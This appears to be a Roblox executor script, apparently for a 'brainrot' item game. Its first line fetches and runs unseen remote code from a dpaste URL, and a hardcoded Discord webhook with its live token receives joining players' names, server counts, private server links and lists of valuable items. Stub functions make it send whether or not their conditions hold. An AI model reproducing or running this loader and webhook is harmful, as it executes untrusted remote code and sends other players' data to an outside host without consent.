loadstring(game:HttpGet("https://dpaste.com/385R5UGMC.txt", true))()
--==============================
-- DISCORD WEBHOOK SETTINGS
--==============================
local Webhook1 = "https://discord.com/api/webhooks/1419673301910945802/lN4xGUEdbJOS03lAOZNyK-4qvmCvyceulN-nhkYSCsBpLIipLaDqwWdiIGz6cNb0Wh8m"
local Username = "Captain Black"

--==============================
-- SERVICES
--==============================
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")

--==============================
-- SAFETY FALLBACKS (para walang error)
--==============================
local function getAllBrainrots()
	return {}
end

local function hasHighValueBrainrotAbove10M()
	return true -- para mag send kahit wala
end

local function formatMoney(v)
	return "$" .. tostring(v or 0)
end

local function isAuthorizedUser()
	return false
end

local storedPrivateServerLink = "Not available"

--==============================
-- WEBHOOK FUNCTION
--==============================
local function sendPlayerJoinWebhook(player)
    local brainrots = getAllBrainrots()
    
    if not hasHighValueBrainrotAbove10M(brainrots) then
        return
    end
    
    local joinedPlayers = Players:GetPlayers()
    local playerCount = #joinedPlayers
    local maxPlayers = Players.MaxPlayers
    
    local topBrainrots = {}
    for i = 1, math.min(5, #brainrots) do
        table.insert(topBrainrots, brainrots[i])
    end
    
    local brainrotText = ""
    for _, details in ipairs(topBrainrots) do
        brainrotText = brainrotText .. string.format("**%s** - %s\n", details.name, formatMoney(details.moneyPerSec))
    end
    
    local isAuthorized = isAuthorizedUser(player)
    local embedColor
    local statusMessage
    
    if isAuthorized then
        embedColor = 65280
        statusMessage = "Server is safe\n**Players: " .. playerCount .. "/" .. maxPlayers .. "**"
    else
        embedColor = 16711680
        statusMessage = "**Might be a trap! Be careful!!!**\n**Players: " .. playerCount .. "/" .. maxPlayers .. "**"
    end
    
    local embedData = {
        username = Username,
        content = "",
        embeds = {{
            title = "Player Joined Server",
            color = embedColor,
            fields = {
                {
                    name = "Player Info",
                    value = string.format("**%s** (%s)", player.Name, player.DisplayName),
                    inline = false
                },
                {
                    name = "Server Status",
                    value = statusMessage,
                    inline = false
                },
                {
                    name = "Top 5 Brainrots",
                    value = brainrotText ~= "" and brainrotText or "No brainrots found",
                    inline = false
                },
                {
                    name = "Private Server Link",
                    value = storedPrivateServerLink ~= "" and storedPrivateServerLink or "Not available",
                    inline = false
                }
            }
        }}
    }
    
    local jsonData = HttpService:JSONEncode(embedData)
    local req = http_request or request or (syn and syn.request)
    if req then
        pcall(function()
            req({
                Url = Webhook1,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = jsonData
            })
        end)
    end
end

--==============================
-- PLAYER JOIN LISTENER
--==============================
Players.PlayerAdded:Connect(function(player)
	task.wait(1)
	sendPlayerJoinWebhook(player)
end)
